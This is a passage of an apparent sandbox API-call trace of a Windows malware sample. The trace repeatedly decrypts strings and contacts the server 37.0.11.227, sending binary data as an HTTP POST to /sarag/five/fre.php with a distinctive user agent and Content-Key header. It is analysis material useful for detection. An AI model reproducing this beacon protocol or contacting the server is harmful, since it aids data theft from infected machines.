(lpLibFileName="shlwapi") returned 0x76ed0000 [0328.195] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0328.196] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.196] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0328.197] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.197] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0328.197] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.198] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0328.198] GetProcessHeap () returned 0x690000 [0328.198] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0328.198] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0328.198] GetProcessHeap () returned 0x690000 [0328.198] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0328.198] socket (af=2, type=1, protocol=6) returned 0xb78 [0328.198] connect (s=0xb78, name=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0328.221] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb68*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0328.221] GetProcessHeap () returned 0x690000 [0328.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0328.221] GetProcessHeap () returned 0x690000 [0328.221] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0328.222] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0328.223] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0328.223] GetProcessHeap () returned 0x690000 [0328.223] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0328.223] GetProcessHeap () returned 0x690000 [0328.224] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0328.224] GetProcessHeap () returned 0x690000 [0328.224] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0328.224] GetProcessHeap () returned 0x690000 [0328.224] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0328.225] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0328.226] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0328.226] GetProcessHeap () returned 0x690000 [0328.226] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0328.226] GetProcessHeap () returned 0x690000 [0328.226] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0328.226] send (s=0xb78, buf=0x6ad508*, len=242, flags=0) returned 242 [0328.227] send (s=0xb78, buf=0x6aba40*, len=159, flags=0) returned 159 [0328.227] GetProcessHeap () returned 0x690000 [0328.227] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0328.227] recv (in: s=0xb78, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0328.314] GetProcessHeap () returned 0x690000 [0328.315] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0328.315] GetProcessHeap () returned 0x690000 [0328.315] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0328.315] GetProcessHeap () returned 0x690000 [0328.315] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0328.315] GetProcessHeap () returned 0x690000 [0328.316] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0328.316] closesocket (s=0xb78) returned 0 [0328.316] GetProcessHeap () returned 0x690000 [0328.316] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0328.316] GetProcessHeap () returned 0x690000 [0328.317] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0328.317] GetProcessHeap () returned 0x690000 [0328.317] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0328.317] GetProcessHeap () returned 0x690000 [0328.317] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0328.329] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18c4) returned 0xb78 [0328.333] Sleep (dwMilliseconds=0xea60) [0328.337] GetProcessHeap () returned 0x690000 [0328.337] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0328.338] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.338] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0328.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.347] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0328.354] GetProcessHeap () returned 0x690000 [0328.354] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0328.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.355] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0328.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.356] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0328.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.357] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0328.357] GetProcessHeap () returned 0x690000 [0328.357] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0328.358] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.365] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0328.366] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.366] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0328.367] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.368] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0328.368] GetProcessHeap () returned 0x690000 [0328.368] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0328.369] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.370] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0328.371] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.371] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0328.372] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.372] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0328.373] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.373] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0328.373] GetProcessHeap () returned 0x690000 [0328.373] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0328.373] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0328.373] GetProcessHeap () returned 0x690000 [0328.374] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0328.376] GetProcessHeap () returned 0x690000 [0328.377] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0328.377] GetProcessHeap () returned 0x690000 [0328.377] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0328.378] GetProcessHeap () returned 0x690000 [0328.378] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4148 [0328.379] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.379] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0328.384] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.385] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0328.393] GetProcessHeap () returned 0x690000 [0328.393] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0328.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.394] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0328.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.397] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0328.398] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.398] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0328.398] GetProcessHeap () returned 0x690000 [0328.398] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0328.400] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.400] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4148, pdwDataLen=0x19fcfc | out: pbData=0x6a4148, pdwDataLen=0x19fcfc) returned 1 [0328.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.401] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0328.401] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.402] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0328.402] GetProcessHeap () returned 0x690000 [0328.402] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0328.402] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.403] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0328.403] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.404] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0328.404] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.405] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0328.405] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.405] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0328.406] GetProcessHeap () returned 0x690000 [0328.406] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0328.406] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0328.406] GetProcessHeap () returned 0x690000 [0328.406] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4b0 [0328.406] socket (af=2, type=1, protocol=6) returned 0xb7c [0328.406] connect (s=0xb7c, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0328.432] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0328.432] GetProcessHeap () returned 0x690000 [0328.432] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0328.432] GetProcessHeap () returned 0x690000 [0328.433] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0328.433] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0328.434] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0328.434] GetProcessHeap () returned 0x690000 [0328.434] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0040 [0328.434] GetProcessHeap () returned 0x690000 [0328.435] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0328.435] GetProcessHeap () returned 0x690000 [0328.435] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4418 [0328.435] GetProcessHeap () returned 0x690000 [0328.435] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0328.435] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0328.436] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0328.436] GetProcessHeap () returned 0x690000 [0328.436] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0328.436] GetProcessHeap () returned 0x690000 [0328.437] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0328.437] send (s=0xb7c, buf=0x6ad508*, len=242, flags=0) returned 242 [0328.437] send (s=0xb7c, buf=0x6aba40*, len=159, flags=0) returned 159 [0328.437] GetProcessHeap () returned 0x690000 [0328.437] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0328.437] recv (in: s=0xb7c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0328.589] GetProcessHeap () returned 0x690000 [0328.589] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0328.589] GetProcessHeap () returned 0x690000 [0328.590] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0328.590] GetProcessHeap () returned 0x690000 [0328.590] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0040 | out: hHeap=0x690000) returned 1 [0328.590] GetProcessHeap () returned 0x690000 [0328.591] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0328.591] closesocket (s=0xb7c) returned 0 [0328.592] GetProcessHeap () returned 0x690000 [0328.592] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4b0 | out: hHeap=0x690000) returned 1 [0328.592] GetProcessHeap () returned 0x690000 [0328.592] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0328.592] GetProcessHeap () returned 0x690000 [0328.594] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0328.595] GetProcessHeap () returned 0x690000 [0328.595] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0328.595] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18c8) returned 0xb7c [0328.597] Sleep (dwMilliseconds=0xea60) [0328.599] GetProcessHeap () returned 0x690000 [0328.599] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0328.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.601] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0328.612] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.612] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af188) returned 1 [0328.715] GetProcessHeap () returned 0x690000 [0328.715] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0328.715] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.716] CryptImportKey (in: hProv=0x6af188, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0328.717] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.717] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0328.718] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.721] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0328.721] GetProcessHeap () returned 0x690000 [0328.722] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0328.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.723] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0328.723] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.724] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0328.724] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.725] CryptReleaseContext (hProv=0x6af188, dwFlags=0x0) returned 1 [0328.725] GetProcessHeap () returned 0x690000 [0328.725] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0328.725] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.726] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0328.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.727] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0328.727] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.728] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0328.729] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.729] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0328.729] GetProcessHeap () returned 0x690000 [0328.729] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0328.729] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0328.729] GetProcessHeap () returned 0x690000 [0328.730] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0328.730] GetProcessHeap () returned 0x690000 [0328.730] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0328.730] GetProcessHeap () returned 0x690000 [0328.730] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0328.730] GetProcessHeap () returned 0x690000 [0328.730] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0328.731] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.731] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0328.761] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.761] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0328.767] GetProcessHeap () returned 0x690000 [0328.767] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0328.768] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.768] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0328.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.769] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0328.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.770] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0328.770] GetProcessHeap () returned 0x690000 [0328.771] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0328.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.772] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0328.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.773] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0328.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.773] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0328.774] GetProcessHeap () returned 0x690000 [0328.774] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0328.774] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.774] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0328.775] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.775] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0328.776] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.776] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0328.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.777] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0328.777] GetProcessHeap () returned 0x690000 [0328.777] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0328.777] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), 